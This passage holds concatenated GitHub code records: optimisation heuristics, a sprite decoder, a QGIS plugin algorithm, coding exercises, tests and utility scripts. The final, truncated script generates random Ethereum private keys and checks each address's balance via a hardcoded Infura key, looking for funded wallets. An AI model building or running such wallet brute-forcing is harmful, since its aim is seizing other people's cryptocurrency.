","repo_name":"StrugglezX/PoeFollowBot","sub_path":"PoeNeuron.py","file_name":"PoeNeuron.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"11490330909","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 11 14:38:56 2022\n@author: Kamaldeep Kaur\n@Id : 35984681\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n# Function to read and parse Input file\ndef ReadInput(filename): \n dataFile = open(filename, \"r\")\n data = []\n headers = []\n rhss = []\n while True:\n rawdata = [] \n fline = dataFile.readline()\n fline = 
fline.strip()\n if len(fline) == 0: \n break\n vars = fline.split(' ')\n header = [float(var) for var in vars]\n headers.append(header)\n while len(rawdata)!= (header[0])*(header[1]+1): # Read all objective and constraint elements as speciifed in the first row of data set \n theline = dataFile.readline()\n theline = theline.strip()\n if len(theline) == 0:\n break \n readData = theline.split(\" \")\n rawdata+= readData\n rawdata = [float(item) for item in rawdata]\n datum = np.array(rawdata)\n datum = np.reshape(datum,(int(header[1]+1),int(header[0]))) \n lastline = dataFile.readline()\n lastline = lastline.strip()\n if len(lastline) == 0:\n break\n vars = lastline.split(' ')\n rhs = [float(var) for var in vars] # Extract Rhs values for each dataset and append in rhss\n rhss.append(rhs)\n #Convert array to dataframe and transpose data to have Objective and Constraints as columns\n df = pd.DataFrame(datum)\n df = df.astype(float)\n df = df.transpose()\n # create column names in dataframe\n collist = []\n collen = len(df.columns)\n for i in range(collen):\n if i == 0:\n collist.append(str(\"Obj\")) \n else:\n collist.append(str(\"Con\"+str(i)))\n\n df.columns = collist\n data.append(df) #Append each dataset extracted from the file to list called \"data\" \n dataFile.close()\n return data,headers,rhss\n\n\n\n# Function to generate Constructive initial solution \ndef InitialSolution(df,collen,rhs,elmts):\n x = np.random.randint(1, collen) # Choose constraint from random generator to asses profit to Weight ration for knapsack \n #print(\"Intial Solution column\",x)\n df[\"P/W\"] = df[\"Obj\"]/(df[str(\"Con\"+str(x))].replace(0,1))\n df = df.sort_values(by=\"P/W\", ascending=False) # Sort items as per Profit to Weight ratio in desc order\n sol = pd.DataFrame(columns = df.columns)\n conc , binsol = [0]*(collen-1) , [0]*elmts\n for i in range(len(df)): # Validate rhs values constrains for each item entering the sack\n for j in range(collen-1):\n conc[j]= conc[j] + df[str(\"Con\"+str(j+1))].values[i]\n if (any(conc[i] > rhs[i] for i in range(len(conc))) == True) :\n break \n sol = sol.append(df[i:i+1])\n indexes = sol.index.values\n for i in indexes :\n binsol[i] = 1 # Initial solution in binary form\n return sol , binsol\n\n# Function to calculate total weight for each constraint to check solution feasability\ndef TotProConstraints(df,binsol,collen):\n df['binsol'] = binsol\n conc = [0]*(collen-1)\n pro = 0\n pro = sum(df[\"Obj\"]*df[\"binsol\"])\n for j in range(collen-1):\n conc[j]= conc[j] + sum(df[str(\"Con\"+str(j+1))]*df[\"binsol\"]) \n return pro,conc\n\n# Function to find neighbouring solution for Hill Climbing\ndef Negihboursol(binsol):\n n = len(binsol)\n result = np.copy(binsol)\n rnd = np.random.RandomState() \n i = rnd.randint(n) # pick an item at random and swap the values 0 to 1 / 1 to 0 \n if result[i] == 0:\n result[i] = 1\n elif result[i] == 1:\n result[i] = 0\n return result\n\n# Hill Climbing method \ndef HillClimbing(df,rhs,collen,binsol,numiter = 1000):\n # First evaluate the initial solution (its total proffit)\n sol = binsol\n df = df.set_index([df.index.values + 1])\n curr_pro = sum(df[\"Obj\"]*sol)\n # Now carry out the main loop of the algorithm\n for i in range(numiter):\n temp = Negihboursol(sol) # Find Neighbouring solution\n (neg_pro, negconlist) = TotProConstraints(df,temp,collen)\n if not(any(negconlist[i] > rhs[i] for i in range(len(negconlist))) == True) : # Check feasability of the neighbouring solution\n if (neg_pro > curr_pro): # better solution, so accept 
adjacent\n sol = temp.copy(); \n curr_pro = neg_pro\n \n df[\"binsol\"] = sol\n finsol = df[df[\"binsol\"]==1] # Final solution of hill climbing\n return finsol\n\n\n# Simulated Annealing method \ndef SimAnnealing(binsol,df,rhs,collen, starttemp= 100000,stoptemp = 0.001, alpha = 0.99):\n # solve using simulated annealing\n df = df.set_index([df.index.values + 1]) \n rnd = np.random.RandomState(5)\n currtemperature = starttemp \n curr_binsol = binsol\n (curr_pro, conlist) = TotProConstraints(df,curr_binsol,collen)\n while currtemperature > stoptemp: \n neg_binsol = Negihboursol(curr_binsol)\n (neg_pro, negconlist) = TotProConstraints(df,neg_binsol,collen)\n if not(any(negconlist[i] > rhs[i] for i in range(len(negconlist))) == True) : # Validate feasability of the neighbouring solution \n if (neg_pro >= curr_pro): # better solution so accept adjacent\n curr_binsol = neg_binsol; curr_pro = neg_pro\n else: # neighbouring solution is worst\n accept_p = np.exp( (neg_pro - curr_pro ) / currtemperature ) # if calculate accept_p value for difference in solution at curr temperation in the iteration\n p = rnd.random()\n if p < accept_p: # if randonm p is less then accept_p worse solution is picked anyway\n curr_binsol = neg_binsol; curr_pro = neg_pro\n currtemperature = currtemperature * alpha\n df[\"binsol\"] = curr_binsol\n df = df[df[\"binsol\"]==1] # Final solution of simulated annearling\n return df \n \n##########################################################################################################\n################################ Read and run the test files #############################################\n##########################################################################################################\n\nfilename = input(\"Enter File Name :\")\ndata, header,rhss = ReadInput(filename = filename)\nheumethod = int(input(\"Enter 1 for Hill Climbing improvement or 2 for Simulated Annealing :\"))\nif heumethod == 1 :\n numiter = int(input(\"Enter number of iterations :\"))\n HillClimbSol = []\n for k in range(len(data)):\n df = data[k]\n elements = len(df)\n rhs = rhss[k]\n collen = len(df.columns)\n for j in range(10):\n finalpro = 0\n for i in range(10):\n intsol, binsol = InitialSolution(df,collen,rhs,elements)\n intsol = intsol.set_index(intsol.index.values+1)\n print(\"Intial Solution based on constructive Heuristics with Profit =\" , \n sum(intsol[\"Obj\"]),\" is \\n\",intsol[\"Obj\"]) \n sol = HillClimbing(df, rhs,collen,binsol,numiter) \n if sum(sol[\"Obj\"]) > finalpro:\n finalpro = sum(sol[\"Obj\"]) \n finalsol = sol\n \n HillClimbSol.append([k,j,list(finalsol[\"binsol\"].index.values),sum(finalsol[\"Obj\"])])\n HillClimbSol = pd.DataFrame(HillClimbSol)\n HillClimbSol.columns = [\"TestInstance\",\"Iteration\",\"Items\",\"Solution\"]\n HillClimbAllSol = HillClimbSol.groupby('TestInstance').agg({'Solution': ['mean', 'min', 'max']})\n HillClimbBestSol= HillClimbSol.loc[HillClimbSol.groupby([\"TestInstance\"])[\"Solution\"].idxmax()]\n HillClimbAllSol.to_csv('HillClimb_Allresults.csv',float_format='%.2f')\n HillClimbBestSol.to_csv('HillClimb_BestSol.csv',float_format='%.2f',header=[\"Test Instance\",\"Iteration\",\"Items\",\"Solution\"])\n print(\"Maximum, Minimum, Avergae and Best solutions are saved in files HillClimb_Allresults.csv and HillClimb_BestSol.csv\")\n print(\"Best Solution Obtained with following profit and items:\",\"\\n\",HillClimbBestSol[[\"TestInstance\",\"Solution\",\"Items\"]]) \nelse :\n if heumethod == 2: \n stemp = int(input(\"Enter start 
temperature:\")) #10000\n sptemp = float(input(\"Enter the end temperature :\")) #1000\n alpha = float(input(\"Enter alpha:\")) #0.98\n SimAneSol = []\n for k in range(len(data)):\n df = data[k]\n elements = len(df)\n rhs = rhss[k]\n collen = len(df.columns)\n for j in range(10):\n intsol, binsol = InitialSolution(df,collen,rhs,elements)\n intsol = intsol.set_index(intsol.index.values+1)\n print(\"Intial Solution based on constructive Heuristics with Profit =\" , \n sum(intsol[\"Obj\"]),\" is \\n\",intsol[\"Obj\"]) \n finalsol = SimAnnealing(binsol, df, rhs, collen, stemp, sptemp, alpha)\n SimAneSol.append([k,j,list(finalsol[\"binsol\"].index.values),sum(finalsol[\"Obj\"])])\n SimAneSol = pd.DataFrame(SimAneSol)\n SimAneSol.columns = [\"TestInstance\",\"Iteration\",\"Items\",\"Solution\"]\n SimAneAllSol = SimAneSol.groupby('TestInstance').agg({'Solution': ['mean', 'min', 'max']})\n SimAneBestSol= SimAneSol.loc[SimAneSol.groupby([\"TestInstance\"])[\"Solution\"].idxmax()]\n SimAneAllSol.to_csv('SimAnne_Allresults.csv',float_format='%.2f')\n SimAneBestSol.to_csv('SimAnne_BestSol.csv',float_format='%.2f',header=[\"Test Instance\",\"Iteration\",\"Items\",\"Solution\"])\n print(\"Maximum, Minimum, Avergae and Best solutions are saved in files SimAnne_Allresults.csv and SimAnne_BestSol.csv\")\n print(\"Best Solution Obtained with following profit and items:\",\"\\n\",SimAneBestSol[[\"TestInstance\",\"Solution\",\"Items\"]]) \n\n else :\n print(\"Option entered is invalid\")\n","repo_name":"kdeepkaur/Data-Science-Code","sub_path":"Multi Knapsack Heuristics.py","file_name":"Multi Knapsack Heuristics.py","file_ext":"py","file_size_in_byte":9706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22003639167","text":"# def not_string(str, n):\n# first_Part = str[:n]\n# last_Part = str[n+1:]\n# return first_Part + last_Part\n \n# print(not_string('jahangir', 2))\n\n\n# def change_sring(str1):\n# one = str1[-1:]\n# toq = str1[1:-1]\n# three = str1[:1]\n\n# return one + toq + three\n# # return str1[-1:] + str1[1:-1] + str1[:1]\n\t \n# print(change_sring('abcd'))\n# print(change_sring('12345'))\n\n# def fornt3(str):\n# fornt_end = 3\n# if len(str) <= 3:\n# jahangri = \"jahangri\"\n# fornt = str[:fornt_end]\n\n# return fornt + fornt + fornt\n\n# print(fornt3(\"valll\"))\n\n# def sting_times(str, n):\n# result = \"\"\n# for j in range(n):\n# result += str\n\n# return result\n\n# print(sting_times(\"jahangri\", 3))\n\n\n# def front_times(str, n):\n# result = \"\"\n# font_size = 3\n \n# if len(str) <= font_size:\n# font_size = len(str)\n# front = str[:font_size]\n\n# for j in range(n):\n# result = result + front\n# return result\n# print(front_times(\"jahangri\", 5))\n\n# def string_bit(str):\n# result = \"\"\n# for i in range(len(str)):\n# if i % 2 == 0:\n# result = result + str[i]\n# return result\n\n# print(string_bit(\"jahangrialam\"))\n\n\ndef string_splote(str):\n result = \"\"\n\n for i in range(len(str)):\n result = result + str[:i+1]\n return result\nprint(string_splote(\"jaha\"))","repo_name":"jahangir83/Chat_APP","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31197625990","text":"from pathlib import Path\nimport argparse\nimport sys\nimport struct\nimport json\n\ndef error(message):\n print(\"ERROR:\", message, file=sys.stderr)\n\ndef read_uint(f, num_bytes = 4):\n if num_bytes == 4:\n return 
struct.unpack('<I', f.read(4))[0]\n return int.from_bytes(f.read(num_bytes), 'little') # little-endian fallback for other widths\n\ndef sbyte(i):\n if i >= 128:\n return i - 256\n return i\n\ndef read_bit(data, start, start_bit):\n if data[start] & start_bit:\n v = 1\n else:\n v = 0\n\n start_bit //= 2\n if start_bit == 0:\n start_bit = 128\n start += 1\n return (start, start_bit, v)\n\ndef decode(infile, outfile, level_flag, index_zero_is_level_order_data):\n\n with open(infile, 'rb') as fin:\n data = fin.read()\n\n file_size = len(data)\n file_offset = 0\n sprite_index_offset = 0\n if level_flag:\n file_offset = data[0] + 256*data[1]\n if file_offset >= file_size:\n return\n sprite_index_offset = 200\n\n sprites = []\n num_sprites = (data[file_offset] + 256*data[file_offset + 1]) // 2\n for i in range(num_sprites):\n offset = file_offset + data[file_offset + i*2] + 256*data[file_offset + 1 + i*2]\n sprites.append(offset)\n\n sprites.append(file_size)\n\n spr_data = {}\n sprite_array = []\n for i in range(num_sprites):\n start = sprites[i]\n if i < (num_sprites-1):\n end = sprites[i+1]\n else:\n end = file_size\n\n if (i==0) and index_zero_is_level_order_data:\n spr_data[\"level order data\"] = {\n \"developer_flags\": hex(data[start]),\n \"first level\": chr(data[start+1]),\n \"level order\": \"\".join([chr(data[x]) for x in range(start+2, start+18)])\n }\n else:\n sprite = { \"sprite number\": hex(sprite_index_offset + i) }\n if (start != end):\n width = int(data[start+2])\n height = 1+int(data[start+3])\n sprite[\"offset x\"] = sbyte(data[start])\n sprite[\"offset y\"] = sbyte(data[start+1])\n sprite[\"sprite width\"] = width\n sprite[\"sprite height\"] = height-1\n\n start += 4\n start_bit = 128\n lines = [\"\"]*height\n for x in range(width):\n for y in range(height):\n start, start_bit, sprite_bit = read_bit(data, start, start_bit)\n start, start_bit, mask_bit = read_bit(data, start, start_bit)\n\n if not sprite_bit:\n if mask_bit:\n lines[y] += '.'\n else:\n lines[y] += '#'\n else:\n lines[y] += ' '\n if mask_bit:\n for y2 in range(y+1,height):\n lines[y2] += ' '\n break\n\n lines = list(reversed(lines))\n lines = lines[1:] # Remove first line\n\n # move to start of next byte\n if start_bit != 128:\n start += 1\n\n # Check if there are reserved bytes, rather than a standard given set of pixel lines with a width, height\n length_of_reserved_bytes = (sprites[i+1] - start)\n if length_of_reserved_bytes > 0:\n if len(lines) == 0:\n # set zeros when we have reserved space\n lines = '####' * length_of_reserved_bytes\n\n sprite[\"pixels\"] = lines\n\n sprite_array.append(sprite)\n spr_data[\"sprites\"] = sprite_array\n\n with open(outfile, 'w') as fout:\n print(json.dumps(spr_data, indent=4), file=fout)\n\n\nclass MyParser(argparse.ArgumentParser):\n def error(self, message):\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\n def print_help(self, venue=sys.stdout):\n print(\"\"\"usage: decoder.py [options]\n\nConverts binary sprite file from Imogen to text.\n\noptions:\n -h --help show this help message and exit\n -i --input input file (binary sprite file)\n -o --output output file (txt file)\n -z --zero index zero is level order data\n -l --level input is a level file\n\"\"\", file=venue)\n\nif __name__ == '__main__':\n parser = MyParser(\n prog=\"decoder\",\n description=\"Converts binary sprite file from Imogen to text\",\n epilog=\"TobyLobster, 2023\")\n\n parser.add_argument('-i', '--input', help=\"input binary filepath\")\n parser.add_argument('-o', '--output', help=\"output text filepath\")\n parser.add_argument('-z', '--zero', help=\"index zero is level order data\", 
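 # argparse.BooleanOptionalAction (Python 3.9+) turns this flag into a
 # paired --zero/--no-zero switch; with default=False it only flips on
 # when passed explicitly, and the same applies to --level below.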
action=argparse.BooleanOptionalAction, default=False)\n parser.add_argument('-l', '--level', help=\"input is a level file\", action=argparse.BooleanOptionalAction, default=False)\n\n if len(sys.argv)==1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n args = parser.parse_args()\n\n if (args.input != None) and (args.output != None):\n if args.input == args.output:\n error(\"Input and output are the same\")\n exit(-2)\n decode(args.input, args.output, args.level, args.zero)\n exit(0)\n else:\n error(\"Need input and output parameters\")\n\n exit(-1)\n","repo_name":"ZornsLemma/Imogen","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37880331116","text":"import inspect\r\nfrom typing import Dict, Any, List, Tuple\r\n\r\nimport numpy as np\r\n\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.typing import RegressorDump\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import (QgsProcessingContext, QgsProcessingFeedback)\r\nfrom enmapbox.typeguard import typechecked\r\n\r\n\r\n@typechecked\r\nclass PrepareRegressionDatasetFromCodeAlgorithm(EnMAPProcessingAlgorithm):\r\n P_CODE, _CODE = 'code', 'Code'\r\n P_OUTPUT_DATASET, _OUTPUT_DATASET = 'outputRegressionDataset', 'Output dataset'\r\n\r\n @classmethod\r\n def displayName(cls) -> str:\r\n return 'Create regression dataset (from Python code)'\r\n\r\n def shortDescription(self) -> str:\r\n return 'Create a regression dataset from Python code and store the result as a pickle file.'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._CODE, 'Python code specifying the regression dataset.'),\r\n (self._OUTPUT_DATASET, self.PickleFileDestination)\r\n ]\r\n\r\n def code(cls):\r\n from enmapboxprocessing.typing import Number, List, Target, RegressorDump\r\n\r\n # specify targets and feature names\r\n targets: List[Target] = [\r\n Target(name='variable 1', color='#ff0000'),\r\n Target(name='variable 2', color='#00ff00')\r\n ]\r\n features: List[str] = ['Feature 1', 'Feature 2', 'Feature 3']\r\n\r\n # specify features X as 2d-array with shape (samples, features)\r\n X: List[List[Number]] = [\r\n [1, 2, 3],\r\n [4, 5, 6]\r\n ]\r\n # specify targets y as 2d-array with shape (samples, targets)\r\n y: List[List[float]] = [\r\n [1.1, 1.2], [2.1, 2.2]\r\n ]\r\n\r\n return RegressorDump(targets, features, X, y)\r\n\r\n def defaultCodeAsString(self):\r\n try:\r\n lines = [line[8:] for line in inspect.getsource(self.code).split('\\n')][1:-2]\r\n except OSError:\r\n lines = ['']\r\n lines = '\\n'.join(lines)\r\n return lines\r\n\r\n def regressorDump(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext\r\n ) -> RegressorDump:\r\n namespace = dict()\r\n code = self.parameterAsString(parameters, self.P_CODE, context)\r\n exec(code, namespace)\r\n targets, features, X, y = [namespace[key] for key in ['targets', 'features', 'X', 'y']]\r\n X = np.array(X)\r\n y = np.array(y)\r\n regressorDump = RegressorDump(targets, features, X, y)\r\n return regressorDump\r\n\r\n def group(self):\r\n return Group.DatasetCreation.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterCode(self.P_CODE, self._CODE, self.defaultCodeAsString())\r\n self.addParameterFileDestination(self.P_OUTPUT_DATASET, self._OUTPUT_DATASET, self.PickleFileFilter)\r\n\r\n def 
processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n filename = self.parameterAsFileOutput(parameters, self.P_OUTPUT_DATASET, context)\r\n\r\n with open(filename + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n regressorDump = self.regressorDump(parameters, context)\r\n Utils.pickleDump(regressorDump.__dict__, filename)\r\n\r\n result = {self.P_OUTPUT_DATASET: filename}\r\n self.toc(feedback, result)\r\n return result\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/prepareregressiondatasetfromcodealgorithm.py","file_name":"prepareregressiondatasetfromcodealgorithm.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"39473050529","text":"'''\nSession 4 Prompt: Write a Python program that declares a class\ndescribing your favorite animal. Have the data members of the \nclass represent the following physical parameters of the \nanimal: length of the arms (float), length of the legs (float), \nnumber of eyes (int), does it have a tail? (bool), is it furry? \n(bool). Write an initialization function that sets the values \nof the data members when an instance of the class is created. \nWrite a member function of the class to print out and describe \nthe data members representing the physical characteristics of \nthe animal.\n\n'''\n\nimport sys\n\nclass Panda: #declaring class\n\t#print out description on animal\n\tdef print(self):\n\t\tprint(\"\\nMy favorite animal is a Panda\")\n\t\tprint(f\"Its arms are about {self.num_arms} inches long\")\n\t\tprint(f\"Its legs are about {self.num_legs} inches long\")\n\t\tprint(f\"It has {self.num_eyes} eyes\")\n\t\tif(self.has_tail == True):\n\t\t\tprint(f\"It does have a tail\")\n\t\telse:\n\t\t\tprint(\"It does not have a tail\")\n\n\t\tif(self.is_furry == True):\n\t\t\tprint(f\"It is furry\")\n\t\telse:\n\t\t\tprint(\"It is not furry\")\n\n\t\tprint(\"\\n\")\n\n\t#init function to set values of data members\n\tdef __init__(self, arms=1.0, legs=1.0, eyes=2, tail=True, furry=True):\n\t\tself.num_arms = arms\n\t\tself.num_legs = legs\n\t\tself.num_eyes = eyes\n\t\tself.has_tail = tail\n\t\tself.is_furry = furry\n\ndef main():\n\n\t#set data members for animal attributes\n\t#with default data\n\tarms = 26.5\n\tlegs = 25.0\n\teyes = 2\n\ttail = True\n\tfurry = True\n\t#set values of data members\n\tanimal = Panda(arms=arms,legs=legs,eyes=eyes,tail=tail,furry=furry)\n\t#print out description\n\tanimal.print()\n\nif __name__==\"__main__\":\n\tmain()\n\n\n","repo_name":"Herrerasaurus/astr-19","sub_path":"Prompt4.py","file_name":"Prompt4.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32479663941","text":"def produitMatriciel(matrice1,matrice2):\n produit_matriciel = []\n for i in range(len(matrice1)):\n ligne = []\n for j in range(len(matrice2[0])):\n element = 0\n for k in range(len(matrice1[0])):\n element += matrice1[i][k]*matrice2[k][j]\n ligne.append(element)\n produit_matriciel.append(ligne)\n return produit_matriciel\n\nX = [[12,7,3],\n [4 ,5,6],\n [7 ,8,9]]\nY = [[5,8,1,2],\n [6,7,3,0],\n [4,5,9,1]]\nprint(produitMatriciel(X,Y))\n","repo_name":"Philtesting/Exercice-Python","sub_path":"4eme 
cours/Programme/Matrice.py","file_name":"Matrice.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22563366118","text":"import serial\nimport matplotlib.pyplot as plt\n\nser = serial.Serial('/dev/ttyUSB0', 115200)\n\ndef get_gcode_from_vector(points, contours):\n arr = [];\n\n gcode = []\n first_point = 0\n for number_of_points_in_contour in contours:\n for i in range(first_point, number_of_points_in_contour + 1):\n x = points[i][0] + 100\n y = points[i][1] + 100\n\n arr.append((x, y))\n\n gcode.append(\"G1X\" + str(x) + \"Y\" + str(y))\n\n if i is first_point:\n gcode.append(\"G1Z1\")\n arr.append((points[first_point][0] + 100, points[first_point][1] + 100))\n gcode.append(\"G1X\" + str(points[first_point][0] + 100) + \"Y\" + str(points[first_point][1] + 100))\n first_point = number_of_points_in_contour + 1\n gcode.append(\"G1Z5\")\n\n print(arr)\n\n plt.plot(*zip(*arr))\n arr = []\n\n plt.show()\n\n return gcode\n\ndef send_codes_to_printer(codes):\n for code in codes:\n ser.write((code + '\\n').encode())\n while True:\n result = ser.readline()\n print(result)\n if result == b\"ok\\n\":\n break\n","repo_name":"Xeyler/printerm","sub_path":"printerm/vector2gcode.py","file_name":"vector2gcode.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25792205399","text":"#Two Sum 2 leetcode 167\nclass TwoSum2Solution:\n def twoSum(self, numbers, target):\n valuesToReturn = {}\n for index, num in enumerate(numbers):\n if target - num in valuesToReturn:\n return [valuesToReturn[target - num], index + 1]\n else:\n valuesToReturn[num] = index + 1\n\n#Majority Element\nclass MajorityElementSolution:\n def majorityElement(self, nums):\n count = {}\n for num in nums:\n if num not in count:\n count[num] = 1\n if count[num] > len(nums) / 2:\n return num\n else:\n count[num] += 1\n\n#factorial Trailing zeroes\nclass ZeroCountFactorialSolution:\n def trailingZeroes(self, n):\n zeroCount = 0\n while n > 0:\n n //= 5\n zeroCount += n\n return zeroCount\n","repo_name":"jameszhu1/LeetCodeProblems","sub_path":"week2/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26229828053","text":"import zoo\nimport sys\n\ndef echo(conf,inputs,outputs):\n if \"a\" in inputs:\n outputs[\"a\"][\"value\"]=inputs[\"a\"][\"value\"]\n if \"mimeType\" in inputs[\"a\"]:\n outputs[\"a\"][\"mimeType\"]=inputs[\"a\"][\"mimeType\"]\n if \"mediaType\" in inputs[\"a\"]:\n outputs[\"a\"][\"mediaType\"]=inputs[\"a\"][\"mediaType\"]\n if \"encoding\" in inputs[\"a\"]:\n outputs[\"a\"][\"encoding\"]=inputs[\"a\"][\"encoding\"]\n else:\n outputs[\"a\"][\"value\"]=\"Empty\"\n if \"b\" in inputs:\n outputs[\"b\"][\"value\"]=inputs[\"b\"][\"value\"]\n if \"dataType\" in inputs[\"b\"]:\n outputs[\"b\"][\"dataType\"]=inputs[\"b\"][\"dataType\"]\n else:\n outputs[\"b\"][\"value\"]=\"Empty\"\n if \"c\" in inputs:\n outputs[\"c\"][\"value\"]=inputs[\"c\"][\"value\"]\n else:\n outputs[\"c\"][\"value\"]=\"Empty\"\n print(inputs[\"c\"],file=sys.stderr)\n return 
zoo.SERVICE_SUCCEEDED\n","repo_name":"omshinde/ZOO-Project-1","sub_path":"zoo-project/zoo-services/echo-py/cgi-env/echo_service.py","file_name":"echo_service.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"718575607","text":"import time\nimport json\n\nfrom pageObjects.CommonPage import CommonPage\nfrom pageObjects.HomePage import HomePage\nfrom pageObjects.SearchPage import SearchPage\n\nclass Test_Quiz():\n \"\"\"\n Class contains test cases specified in the quiz to validate foreign exchange portal.\n \"\"\"\n\n def setup_method(self, method):\n \"\"\"\n setup_method : to initialise the test data before every testcase\n \"\"\"\n f = open(\".\\\\conf\\\\test_data.json\", \"r\")\n self.test_data = json.loads(f.read())\n f.close()\n\n def teardown_method(self, method):\n \"\"\"\n teardown_method : to close the browser after every testcase\n \"\"\"\n self.driver.quit()\n\n def test_question2(self, setup):\n \"\"\"\n test_question2 function validates question 2 of the assignment.\n It is a positive testcase to validate following workflow\n\n Marks the testcase as Pass if all the above steps are working as mentioned,\n else marks the testcase as Fail\n \"\"\"\n # 1. Open the following URL: https://www.moneycorp.com/en-gb/\n self.driver.get(self.test_data[\"common\"][\"url\"])\n\n # 2. Change the language and region from the top right corner to USA (English).\n common_page = CommonPage(self.driver)\n\n # Modal appears at bottom, click on accept Cookies\n common_page.accept_cookies()\n\n # Select language to USA\n common_page.select_locale()\n\n # 3. Click Find out more for “Foreign exchange solutions”\n home_page = HomePage(self.driver)\n home_page.click_foreign_exchange_solution()\n\n # Validate if you have arrived on the page\n home_page.verify_title() # TBD just to inform the verification failure\n\n # 4. Search for the word “international payments” using the search box\n common_page.search(self.test_data[\"test_question2\"][\"string_to_be_searched\"])\n\n # 5. Validate if you have arrived on the result page\n search_page = SearchPage(self.driver)\n search_page.verify_title() # TBD just to inform the verification failure\n\n # 6. 
Validate that each article in the list displays a link that starts with https://www.moneycorp.com/en-us/\n assert search_page.verify_links(self.test_data[\"test_question2\"][\"article_url_prefix\"])\n\n # Delay added at last just for demo purpose\n time.sleep(5)\n\n # We can include following components if required and have sufficient time:\n # logging module\n # reporting module\n # configuration reader class\n # marker\n # locator management class\n # test data management class","repo_name":"nemjain962/Assignment_2","sub_path":"test_cases/test_foreign_exchange.py","file_name":"test_foreign_exchange.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26999851401","text":"from plt_testing import *\n\nt = get_example_trace('anon-v4.pcap')\n\nn = nfp = 0; offset = 12\nfor pkt in t:\n n += 1\n\n if pkt.udp and (pkt.udp.src_port == 53 or pkt.udp.dst_port == 53):\n nfp += 1\n\n test_println(\"%4d:\" % (n), get_tag())\n print_udp(pkt.udp, offset, get_tag(\"n:\"+str(n)))\n test_println('')\n\n if nfp == 4:\n break\n\ntest_println(\"%d raw -> %d filtered packets\" % (n, nfp), get_tag())\n","repo_name":"nevil-brownlee/python-libtrace","sub_path":"test/v2-test-cases/test-sw-filter.py","file_name":"test-sw-filter.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"2600260196","text":"from web3 import Web3\nfrom Crypto.Hash import keccak\nimport ecdsa\nimport time\nimport keyboard # Using keyboard to detect key press to stop the program\n\nw3 = Web3(Web3.HTTPProvider('https://mainnet.infura.io/v3/cc3faa47b8dc4c26ae1ad24898dc47ba'))\n\n\ndef keccak256(data):\n k_hash = keccak.new(digest_bits=256)\n k_hash.update(data)\n return k_hash.hexdigest()\n\n\ndef generate_ethereum_address():\n private_key = ecdsa.SigningKey.generate(curve=ecdsa.SECP256k1)\n private_key_hex = private_key.to_string().hex()\n\n public_key = private_key.get_verifying_key().to_string()\n public_key_hex = \"04\" + public_key.hex()\n\n # Get the keccak-256 hash of the public key\n hashed_public_key = keccak256(bytes.fromhex(public_key_hex))\n\n # Take the last 20 bytes of this hash\n address = \"0x\" + hashed_public_key[-40:]\n return private_key_hex, address\n\n\ndef check_balance(address):\n checksum_address = Web3.to_checksum_address(address)\n balance = w3.eth.get_balance(checksum_address)\n return balance / (10**18)\n\n\n# The main loop\ntry:\n count = 0\n while True:\n count += 1\n private_key_hex, address = generate_ethereum_address()\n balance = check_balance(address)\n\n if balance > 0:\n print(\n f\"Found an address with a balance! 
